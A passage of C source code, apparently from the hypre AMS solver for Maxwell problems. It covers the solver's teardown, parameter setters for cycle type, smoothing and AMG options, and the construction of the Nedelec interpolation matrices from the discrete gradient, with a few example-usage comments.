ams_data -> Pix = NULL;
ams_data -> Piy = NULL;
ams_data -> Piz = NULL;
ams_data -> A_Pix = NULL;
ams_data -> A_Piy = NULL;
ams_data -> A_Piz = NULL;
ams_data -> B_Pix = 0;
ams_data -> B_Piy = 0;
ams_data -> B_Piz = 0;
ams_data -> interior_nodes = NULL;
ams_data -> G0 = NULL;
ams_data -> A_G0 = NULL;
ams_data -> B_G0 = 0;
ams_data -> projection_frequency = 5;
ams_data -> A_l1_norms = NULL;
ams_data -> A_max_eig_est = 0;
ams_data -> A_min_eig_est = 0;
ams_data -> owns_Pi = 1;
ams_data -> owns_A_G = 0;
ams_data -> owns_A_Pi = 0;
return (void *) ams_data;
}
/*--------------------------------------------------------------------------
* hypre_AMSDestroy
*
* Deallocate the AMS solver structure. Note that the input data (given
* through the Set functions) is not destroyed.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSDestroy(void *solver)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (!ams_data)
{
hypre_error_in_arg(1);
return hypre_error_flag;
}
if (ams_data -> owns_A_G)
if (ams_data -> A_G)
hypre_ParCSRMatrixDestroy(ams_data -> A_G);
if (!ams_data -> beta_is_zero)
if (ams_data -> B_G)
HYPRE_BoomerAMGDestroy(ams_data -> B_G);
if (ams_data -> owns_Pi && ams_data -> Pi)
hypre_ParCSRMatrixDestroy(ams_data -> Pi);
if (ams_data -> owns_A_Pi)
if (ams_data -> A_Pi)
hypre_ParCSRMatrixDestroy(ams_data -> A_Pi);
if (ams_data -> B_Pi)
HYPRE_BoomerAMGDestroy(ams_data -> B_Pi);
if (ams_data -> owns_Pi && ams_data -> Pix)
hypre_ParCSRMatrixDestroy(ams_data -> Pix);
if (ams_data -> A_Pix)
hypre_ParCSRMatrixDestroy(ams_data -> A_Pix);
if (ams_data -> B_Pix)
HYPRE_BoomerAMGDestroy(ams_data -> B_Pix);
if (ams_data -> owns_Pi && ams_data -> Piy)
hypre_ParCSRMatrixDestroy(ams_data -> Piy);
if (ams_data -> A_Piy)
hypre_ParCSRMatrixDestroy(ams_data -> A_Piy);
if (ams_data -> B_Piy)
HYPRE_BoomerAMGDestroy(ams_data -> B_Piy);
if (ams_data -> owns_Pi && ams_data -> Piz)
hypre_ParCSRMatrixDestroy(ams_data -> Piz);
if (ams_data -> A_Piz)
hypre_ParCSRMatrixDestroy(ams_data -> A_Piz);
if (ams_data -> B_Piz)
HYPRE_BoomerAMGDestroy(ams_data -> B_Piz);
if (ams_data -> r0)
hypre_ParVectorDestroy(ams_data -> r0);
if (ams_data -> g0)
hypre_ParVectorDestroy(ams_data -> g0);
if (ams_data -> r1)
hypre_ParVectorDestroy(ams_data -> r1);
if (ams_data -> g1)
hypre_ParVectorDestroy(ams_data -> g1);
if (ams_data -> r2)
hypre_ParVectorDestroy(ams_data -> r2);
if (ams_data -> g2)
hypre_ParVectorDestroy(ams_data -> g2);
if (ams_data -> G0)
hypre_ParCSRMatrixDestroy(ams_data -> A);
if (ams_data -> G0)
hypre_ParCSRMatrixDestroy(ams_data -> G0);
if (ams_data -> A_G0)
hypre_ParCSRMatrixDestroy(ams_data -> A_G0);
if (ams_data -> B_G0)
HYPRE_BoomerAMGDestroy(ams_data -> B_G0);
hypre_SeqVectorDestroy(ams_data -> A_l1_norms);
/* G, x, y ,z, Gx, Gy and Gz are not destroyed */
if (ams_data)
{
hypre_TFree(ams_data, HYPRE_MEMORY_HOST);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetDimension
*
* Set problem dimension (2 or 3). By default we assume dim = 3.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetDimension(void *solver,
HYPRE_Int dim)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (dim != 2 && dim != 3)
hypre_error_in_arg(2);
ams_data -> dim = dim;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetDiscreteGradient
*
* Set the discrete gradient matrix G.
* This function should be called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetDiscreteGradient(void *solver,
hypre_ParCSRMatrix *G)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> G = G;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetCoordinateVectors
*
* Set the x, y and z coordinates of the vertices in the mesh.
*
* Either SetCoordinateVectors or SetEdgeConstantVectors should be
* called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetCoordinateVectors(void *solver,
hypre_ParVector *x,
hypre_ParVector *y,
hypre_ParVector *z)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> x = x;
ams_data -> y = y;
ams_data -> z = z;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetEdgeConstantVectors
*
* Set the vectors Gx, Gy and Gz which give the representations of
* the constant vector fields (1,0,0), (0,1,0) and (0,0,1) in the
* edge element basis.
*
* Either SetCoordinateVectors or SetEdgeConstantVectors should be
* called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetEdgeConstantVectors(void *solver,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> Gx = Gx;
ams_data -> Gy = Gy;
ams_data -> Gz = Gz;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetInterpolations
*
* Set the (components of) the Nedelec interpolation matrix Pi=[Pix,Piy,Piz].
*
* This function is generally intended to be used only for high-order Nedelec
* discretizations (in the lowest order case, Pi is constructed internally in
* AMS from the discrete gradient matrix and the coordinates of the vertices),
* though it can also be used in the lowest-order case or for other types of
* discretizations (e.g. ones based on the second family of Nedelec elements).
*
* By definition, Pi is the matrix representation of the linear operator that
* interpolates (high-order) vector nodal finite elements into the (high-order)
* Nedelec space. The component matrices are defined as Pix phi = Pi (phi,0,0)
* and similarly for Piy and Piz. Note that all these operators depend on the
* choice of the basis and degrees of freedom in the high-order spaces.
*
* The column numbering of Pi should be node-based, i.e. the x/y/z components of
* the first node (vertex or high-order dof) should be listed first, followed by
* the x/y/z components of the second node and so on (see the documentation of
* HYPRE_BoomerAMGSetDofFunc).
*
* If used, this function should be called before hypre_AMSSetup() and there is
* no need to provide the vertex coordinates. Furthermore, only one of the sets
* {Pi} and {Pix,Piy,Piz} needs to be specified (though it is OK to provide
* both). If Pix is NULL, then scalar Pi-based AMS cycles, i.e. those with
* cycle_type > 10, will be unavailable. Similarly, AMS cycles based on
* monolithic Pi (cycle_type < 10) require that Pi is not NULL.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetInterpolations(void *solver,
hypre_ParCSRMatrix *Pi,
hypre_ParCSRMatrix *Pix,
hypre_ParCSRMatrix *Piy,
hypre_ParCSRMatrix *Piz)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> Pi = Pi;
ams_data -> Pix = Pix;
ams_data -> Piy = Piy;
ams_data -> Piz = Piz;
ams_data -> owns_Pi = 0;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetAlphaPoissonMatrix
*
* Set the matrix corresponding to the Poisson problem with coefficient
* alpha (the curl-curl term coefficient in the Maxwell problem).
*
* If this function is called, the coarse space solver on the range
* of Pi^T is a block-diagonal version of A_Pi. If this function is not
* called, the coarse space solver on the range of Pi^T is constructed
* as Pi^T A Pi in hypre_AMSSetup().
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetAlphaPoissonMatrix(void *solver,
hypre_ParCSRMatrix *A_Pi)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_Pi = A_Pi;
/* Penalize the eliminated degrees of freedom */
hypre_ParCSRMatrixSetDiagRows(A_Pi, HYPRE_REAL_MAX);
/* Make sure that the first entry in each row is the diagonal one. */
/* hypre_CSRMatrixReorder(hypre_ParCSRMatrixDiag(A_Pi)); */
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetBetaPoissonMatrix
*
* Set the matrix corresponding to the Poisson problem with coefficient
* beta (the mass term coefficient in the Maxwell problem).
*
* This function call is optional - if not given, the Poisson matrix will
* be computed in hypre_AMSSetup(). If the given matrix is NULL, we assume
* that beta is 0 and use two-level (instead of three-level) methods.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetBetaPoissonMatrix(void *solver,
hypre_ParCSRMatrix *A_G)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_G = A_G;
if (!A_G)
ams_data -> beta_is_zero = 1;
else
{
/* Penalize the eliminated degrees of freedom */
hypre_ParCSRMatrixSetDiagRows(A_G, HYPRE_REAL_MAX);
/* Make sure that the first entry in each row is the diagonal one. */
/* hypre_CSRMatrixReorder(hypre_ParCSRMatrixDiag(A_G)); */
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetInteriorNodes
*
* Set the list of nodes which are interior to the zero-conductivity region.
* A node is interior if interior_nodes[i] == 1.0.
*
* Should be called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetInteriorNodes(void *solver,
hypre_ParVector *interior_nodes)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> interior_nodes = interior_nodes;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetProjectionFrequency
*
* How often to project the r.h.s. onto the compatible subspace Ker(G0^T)
* while iterating with the solver.
*
* The default value is every 5th iteration.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetProjectionFrequency(void *solver,
HYPRE_Int projection_frequency)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> projection_frequency = projection_frequency;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetMaxIter
*
* Set the maximum number of iterations in the three-level method.
* The default value is 20. To use the AMS solver as a preconditioner,
* set maxit to 1, tol to 0.0 and print_level to 0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetMaxIter(void *solver,
HYPRE_Int maxit)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> maxit = maxit;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetTol
*
* Set the convergence tolerance (if the method is used as a solver).
* The default value is 1e-6.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetTol(void *solver,
HYPRE_Real tol)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> tol = tol;
return hypre_error_flag;
}
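/*--------------------------------------------------------------------------
 * EXAMPLE (editorial sketch, not part of the library). The settings the
 * comments above recommend when AMS acts as a preconditioner rather than
 * a standalone solver ("ams" is a hypothetical handle):
 *
 *    hypre_AMSSetMaxIter(ams, 1);      // one AMS cycle per application
 *    hypre_AMSSetTol(ams, 0.0);        // never declare convergence
 *    hypre_AMSSetPrintLevel(ams, 0);   // stay quiet inside the Krylov loop
 *--------------------------------------------------------------------------*/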
/*--------------------------------------------------------------------------
* hypre_AMSSetCycleType
*
* Choose which three-level solver to use. Possible values are:
*
* 1 = 3-level multipl. solver (01210) <-- small solution time
* 2 = 3-level additive solver (0+1+2)
* 3 = 3-level multipl. solver (02120)
* 4 = 3-level additive solver (010+2)
* 5 = 3-level multipl. solver (0102010) <-- small solution time
* 6 = 3-level additive solver (1+020)
* 7 = 3-level multipl. solver (0201020) <-- small number of iterations
* 8 = 3-level additive solver (0(1+2)0) <-- small solution time
* 9 = 3-level multipl. solver (01210) with discrete divergence
* 11 = 5-level multipl. solver (013454310) <-- small solution time, memory
* 12 = 5-level additive solver (0+1+3+4+5)
* 13 = 5-level multipl. solver (034515430) <-- small solution time, memory
* 14 = 5-level additive solver (01(3+4+5)10)
* 20 = 2-level multipl. solver (0[12]0)
*
* 0 = a Hiptmair-like smoother (010)
*
* The default value is 1.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetCycleType(void *solver,
HYPRE_Int cycle_type)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> cycle_type = cycle_type;
return hypre_error_flag;
}
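/*--------------------------------------------------------------------------
 * EXAMPLE (editorial sketch, not part of the library). Selecting the
 * memory-lean 5-level scalar variant from the table above:
 *
 *    hypre_AMSSetCycleType(ams, 13);   // uses Pix/Piy/Piz internally
 *--------------------------------------------------------------------------*/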
/*--------------------------------------------------------------------------
* hypre_AMSSetPrintLevel
*
* Control how much information is printed during the solution iterations.
* The default value is 1 (print residual norm at each step).
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetPrintLevel(void *solver,
HYPRE_Int print_level)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> print_level = print_level;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetSmoothingOptions
*
* Set relaxation parameters for A. Default values: 2, 1, 1.0, 1.0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetSmoothingOptions(void *solver,
HYPRE_Int A_relax_type,
HYPRE_Int A_relax_times,
HYPRE_Real A_relax_weight,
HYPRE_Real A_omega)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_relax_type = A_relax_type;
ams_data -> A_relax_times = A_relax_times;
ams_data -> A_relax_weight = A_relax_weight;
ams_data -> A_omega = A_omega;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
 * hypre_AMSSetChebySmoothingOptions
 *
 * Set the parameters of the Chebyshev smoother for A. Default values: 2, 0.3.
 *
 * AB: note: this could be folded into hypre_AMSSetSmoothingOptions above,
 * but we didn't want to change that function's parameter list.
 *--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetChebySmoothingOptions(void *solver,
HYPRE_Int A_cheby_order,
HYPRE_Real A_cheby_fraction) /* real-valued; the default of 0.3 would truncate to 0 as an int */
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_cheby_order = A_cheby_order;
ams_data -> A_cheby_fraction = A_cheby_fraction;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetAlphaAMGOptions
*
* Set AMG parameters for B_Pi. Default values: 10, 1, 3, 0.25, 0, 0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetAlphaAMGOptions(void *solver,
HYPRE_Int B_Pi_coarsen_type,
HYPRE_Int B_Pi_agg_levels,
HYPRE_Int B_Pi_relax_type,
HYPRE_Real B_Pi_theta,
HYPRE_Int B_Pi_interp_type,
HYPRE_Int B_Pi_Pmax)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> B_Pi_coarsen_type = B_Pi_coarsen_type;
ams_data -> B_Pi_agg_levels = B_Pi_agg_levels;
ams_data -> B_Pi_relax_type = B_Pi_relax_type;
ams_data -> B_Pi_theta = B_Pi_theta;
ams_data -> B_Pi_interp_type = B_Pi_interp_type;
ams_data -> B_Pi_Pmax = B_Pi_Pmax;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetAlphaAMGCoarseRelaxType
*
* Set the AMG coarsest level relaxation for B_Pi. Default value: 8.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetAlphaAMGCoarseRelaxType(void *solver,
HYPRE_Int B_Pi_coarse_relax_type)
{
hypre_AMSData *ams_data = (hypre_AMSData *)solver;
ams_data -> B_Pi_coarse_relax_type = B_Pi_coarse_relax_type;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetBetaAMGOptions
*
* Set AMG parameters for B_G. Default values: 10, 1, 3, 0.25, 0, 0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetBetaAMGOptions(void *solver,
HYPRE_Int B_G_coarsen_type,
HYPRE_Int B_G_agg_levels,
HYPRE_Int B_G_relax_type,
HYPRE_Real B_G_theta,
HYPRE_Int B_G_interp_type,
HYPRE_Int B_G_Pmax)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> B_G_coarsen_type = B_G_coarsen_type;
ams_data -> B_G_agg_levels = B_G_agg_levels;
ams_data -> B_G_relax_type = B_G_relax_type;
ams_data -> B_G_theta = B_G_theta;
ams_data -> B_G_interp_type = B_G_interp_type;
ams_data -> B_G_Pmax = B_G_Pmax;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetBetaAMGCoarseRelaxType
*
* Set the AMG coarsest level relaxation for B_G. Default value: 8.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetBetaAMGCoarseRelaxType(void *solver,
HYPRE_Int B_G_coarse_relax_type)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> B_G_coarse_relax_type = B_G_coarse_relax_type;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSComputePi
*
* Construct the Pi interpolation matrix, which maps the space of vector
* linear finite elements to the space of edge finite elements.
*
* The construction is based on the fact that Pi = [Pi_x, Pi_y, Pi_z],
* where each block has the same sparsity structure as G, and the entries
* can be computed from the vectors Gx, Gy, Gz.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSComputePi(hypre_ParCSRMatrix *A,
hypre_ParCSRMatrix *G,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz,
HYPRE_Int dim,
hypre_ParCSRMatrix **Pi_ptr)
{
hypre_ParCSRMatrix *Pi;
/* Compute Pi = [Pi_x, Pi_y, Pi_z] */
{
HYPRE_Int i, j, d;
HYPRE_Real *Gx_data, *Gy_data, *Gz_data = NULL; /* Gz unused when dim == 2 */
MPI_Comm comm = hypre_ParCSRMatrixComm(G);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(G);
HYPRE_BigInt global_num_cols = dim*hypre_ParCSRMatrixGlobalNumCols(G);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(G);
HYPRE_BigInt *col_starts;
HYPRE_Int col_starts_size;
HYPRE_Int num_cols_offd = dim*hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(G));
HYPRE_Int num_nonzeros_diag = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(G));
HYPRE_Int num_nonzeros_offd = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(G));
HYPRE_BigInt *col_starts_G = hypre_ParCSRMatrixColStarts(G);
col_starts_size = 2;
col_starts = hypre_TAlloc(HYPRE_BigInt, col_starts_size, HYPRE_MEMORY_HOST);
for (i = 0; i < col_starts_size; i++)
col_starts[i] = (HYPRE_BigInt)dim * col_starts_G[i];
Pi = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Pi) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Pi) = 0;
hypre_ParCSRMatrixOwnsColStarts(Pi) = 1;
hypre_ParCSRMatrixInitialize(Pi);
Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(Gx));
Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(Gy));
if (dim == 3)
Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(Gz));
/* Fill in the diagonal part */
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *Pi_diag = hypre_ParCSRMatrixDiag(Pi);
HYPRE_Int *Pi_diag_I = hypre_CSRMatrixI(Pi_diag);
HYPRE_Int *Pi_diag_J = hypre_CSRMatrixJ(Pi_diag);
HYPRE_Real *Pi_diag_data = hypre_CSRMatrixData(Pi_diag);
for (i = 0; i < G_diag_nrows+1; i++)
Pi_diag_I[i] = dim * G_diag_I[i];
for (i = 0; i < G_diag_nnz; i++)
for (d = 0; d < dim; d++)
Pi_diag_J[dim*i+d] = dim*G_diag_J[i]+d;
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*Pi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*Pi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
if (dim == 3)
*Pi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gz_data[i];
}
}
/* Fill in the off-diagonal part */
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *Pi_offd = hypre_ParCSRMatrixOffd(Pi);
HYPRE_Int *Pi_offd_I = hypre_CSRMatrixI(Pi_offd);
HYPRE_Int *Pi_offd_J = hypre_CSRMatrixJ(Pi_offd);
HYPRE_Real *Pi_offd_data = hypre_CSRMatrixData(Pi_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *Pi_cmap = hypre_ParCSRMatrixColMapOffd(Pi);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
Pi_offd_I[i] = dim * G_offd_I[i];
for (i = 0; i < G_offd_nnz; i++)
for (d = 0; d < dim; d++)
Pi_offd_J[dim*i+d] = dim*G_offd_J[i]+d;
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*Pi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*Pi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
if (dim == 3)
*Pi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gz_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
for (d = 0; d < dim; d++)
Pi_cmap[dim*i+d] = (HYPRE_BigInt)dim*G_cmap[i]+(HYPRE_BigInt)d;
}
}
*Pi_ptr = Pi;
return hypre_error_flag;
}
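/*--------------------------------------------------------------------------
 * EXAMPLE (editorial sketch, not part of the library). As the loops above
 * show, each nonzero G_ij contributes dim consecutive entries to row i of
 * Pi: 0.5*|G_ij|*Gx_i, 0.5*|G_ij|*Gy_i (and 0.5*|G_ij|*Gz_i in 3D). A
 * typical internal invocation, with Gx/Gy/Gz as computed in
 * hypre_AMSSetup():
 *
 *    hypre_ParCSRMatrix *Pi;
 *    hypre_AMSComputePi(A, G, Gx, Gy, Gz, 3, &Pi);
 *--------------------------------------------------------------------------*/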
/*--------------------------------------------------------------------------
* hypre_AMSComputePixyz
*
* Construct the components Pix, Piy, Piz of the interpolation matrix Pi,
* which maps the space of vector linear finite elements to the space of
* edge finite elements.
*
* The construction is based on the fact that each component has the same
* sparsity structure as G, and the entries can be computed from the vectors
* Gx, Gy, Gz.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSComputePixyz(hypre_ParCSRMatrix *A,
hypre_ParCSRMatrix *G,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz,
HYPRE_Int dim,
hypre_ParCSRMatrix **Pix_ptr,
hypre_ParCSRMatrix **Piy_ptr,
hypre_ParCSRMatrix **Piz_ptr)
{
hypre_ParCSRMatrix *Pix, *Piy, *Piz = NULL; /* Piz is only built when dim == 3 */
/* Compute Pix, Piy, Piz */
{
HYPRE_Int i, j;
HYPRE_Real *Gx_data, *Gy_data, *Gz_data = NULL; /* Gz unused when dim == 2 */
MPI_Comm comm = hypre_ParCSRMatrixComm(G);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(G);
HYPRE_BigInt global_num_cols = hypre_ParCSRMatrixGlobalNumCols(G);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(G);
HYPRE_BigInt *col_starts = hypre_ParCSRMatrixColStarts(G);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(G));
HYPRE_Int num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(G));
HYPRE_Int num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(G));
Pix = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Pix) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Pix) = 0;
hypre_ParCSRMatrixOwnsColStarts(Pix) = 0;
hypre_ParCSRMatrixInitialize(Pix);
Piy = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Piy) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Piy) = 0;
hypre_ParCSRMatrixOwnsColStarts(Piy) = 0;
hypre_ParCSRMatrixInitialize(Piy);
if (dim == 3)
{
Piz = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Piz) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Piz) = 0;
hypre_ParCSRMatrixOwnsColStarts(Piz) = 0;
hypre_ParCSRMatrixInitialize(Piz);
}
Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(Gx));
Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(Gy));
if (dim == 3)
Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(Gz));
/* Fill in the diagonal part */
if (dim == 3)
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *Pix_diag = hypre_ParCSRMatrixDiag(Pix);
HYPRE_Int *Pix_diag_I = hypre_CSRMatrixI(Pix_diag);
HYPRE_Int *Pix_diag_J = hypre_CSRMatrixJ(Pix_diag);
HYPRE_Real *Pix_diag_data = hypre_CSRMatrixData(Pix_diag);
hypre_CSRMatrix *Piy_diag = hypre_ParCSRMatrixDiag(Piy);
HYPRE_Int *Piy_diag_I = hypre_CSRMatrixI(Piy_diag);
HYPRE_Int *Piy_diag_J = hypre_CSRMatrixJ(Piy_diag);
HYPRE_Real *Piy_diag_data = hypre_CSRMatrixData(Piy_diag);
hypre_CSRMatrix *Piz_diag = hypre_ParCSRMatrixDiag(Piz);
HYPRE_Int *Piz_diag_I = hypre_CSRMatrixI(Piz_diag);
HYPRE_Int *Piz_diag_J = hypre_CSRMatrixJ(Piz_diag);
HYPRE_Real *Piz_diag_data = hypre_CSRMatrixData(Piz_diag);
for (i = 0; i < G_diag_nrows+1; i++)
{
Pix_diag_I[i] = G_diag_I[i];
Piy_diag_I[i] = G_diag_I[i];
Piz_diag_I[i] = G_diag_I[i];
}
for (i = 0; i < G_diag_nnz; i++)
{
Pix_diag_J[i] = G_diag_J[i];
Piy_diag_J[i] = G_diag_J[i];
Piz_diag_J[i] = G_diag_J[i];
}
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*Pix_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*Piy_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
*Piz_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gz_data[i];
}
}
else
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *Pix_diag = hypre_ParCSRMatrixDiag(Pix);
HYPRE_Int *Pix_diag_I = hypre_CSRMatrixI(Pix_diag);
HYPRE_Int *Pix_diag_J = hypre_CSRMatrixJ(Pix_diag);
HYPRE_Real *Pix_diag_data = hypre_CSRMatrixData(Pix_diag);
hypre_CSRMatrix *Piy_diag = hypre_ParCSRMatrixDiag(Piy);
HYPRE_Int *Piy_diag_I = hypre_CSRMatrixI(Piy_diag);
HYPRE_Int *Piy_diag_J = hypre_CSRMatrixJ(Piy_diag);
HYPRE_Real *Piy_diag_data = hypre_CSRMatrixData(Piy_diag);
for (i = 0; i < G_diag_nrows+1; i++)
{
Pix_diag_I[i] = G_diag_I[i];
